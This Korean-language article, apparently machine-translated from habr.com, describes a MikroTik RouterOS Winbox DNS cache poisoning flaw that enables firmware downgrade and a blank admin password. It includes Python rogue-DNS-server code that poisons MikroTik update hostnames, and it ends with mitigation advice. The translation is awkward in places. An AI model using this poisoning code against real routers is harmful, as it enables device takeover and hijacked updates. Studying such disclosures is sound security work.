RouterOS의 백포트 취약점으로 인해 수십만 대의 장치가 위험에 처해 있습니다.

RouterOS(Mikrotik)를 기반으로 장치를 원격으로 다운그레이드하는 기능은 수십만 개의 네트워크 장치를 위험에 빠뜨립니다. 이 취약점은 Winbox 프로토콜의 DNS 캐시 중독과 관련이 있으며 오래되었거나(기본 비밀번호 재설정으로) 수정된 펌웨어를 장치에 로드할 수 있게 해줍니다.

취약점 세부정보

RouterOS 터미널은 DNS 조회를 위한 확인 명령을 지원합니다.

이 요청은 해석기라는 바이너리에 의해 처리됩니다. Resolver는 RouterOS의 Winbox 프로토콜에 연결되는 많은 바이너리 중 하나입니다. 높은 수준에서 Winbox 포트로 전송된 "메시지"는 배열 기반 번호 지정 체계를 기반으로 RouterOS의 다양한 바이너리로 라우팅될 수 있습니다.

기본적으로 RouterOS에는 DNS 서버 기능이 비활성화되어 있습니다.

그러나 서버 기능이 비활성화된 경우에도 라우터는 자체 DNS 캐시를 유지합니다.

example.com과 같이 winbox_dns_request를 사용하여 요청하면 라우터는 결과를 캐시합니다.

요청이 통과해야 하는 DNS 서버를 지정할 수 있으므로 잘못된 주소를 입력하는 것은 쉽습니다. 예를 들어 다음에서 DNS 서버 구현을 구성할 수 있습니다. 필립 클라우스항상 IP 주소 192.168.88.250을 포함하는 A 레코드로 응답합니다.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

이제 Winbox를 사용하여 example.com을 검색하면 라우터의 DNS 캐시가 감염되었음을 알 수 있습니다.

물론 example.com을 중독시키는 것은 라우터가 실제로 이를 사용하지 않기 때문에 별로 유용하지 않습니다. 그러나 라우터는 Upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com 및 download.mikrotik.com에 액세스해야 합니다. 그리고 또 다른 실수 덕분에 한꺼번에 독살하는 것이 가능해졌습니다.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

라우터는 하나의 권한을 요청하고 우리는 5개를 다시 부여합니다. 라우터는 이러한 응답을 모두 올바르게 캐시하지 않습니다.

분명히 이 공격은 라우터의 클라이언트가 공격을 받을 수 있도록 허용하므로 라우터가 DNS 서버 역할을 하는 경우에도 유용합니다.

또한 이 공격을 통해 RouterOS 버전을 다운그레이드하거나 백포트하는 등 더 심각한 취약점을 악용할 수 있습니다. 공격자는 변경 로그를 포함하여 업데이트 서버의 로직을 다시 생성하고 RouterOS가 오래된(취약한) 버전을 현재 버전으로 인식하도록 합니다. 여기서 위험은 버전이 "업데이트"되면 관리자 비밀번호가 기본값으로 재설정된다는 사실에 있습니다. 공격자가 빈 비밀번호로 시스템에 로그인할 수 있습니다!

그럼에도 불구하고 공격은 꽤 효과적입니다. 저자 다음과 관련된 벡터를 포함하여 몇 가지 추가 벡터를 구현합니다. 펌웨어에 백도어 내장, 그러나 이는 이미 중복된 기술이며 불법적인 목적으로 사용하는 것은 불법입니다.

보호

Winbox를 비활성화하기만 하면 이러한 공격으로부터 자신을 보호할 수 있습니다. Winbox를 통한 관리의 편리성에도 불구하고 SSH 프로토콜을 사용하는 것이 더 좋습니다.

출처 : habr.com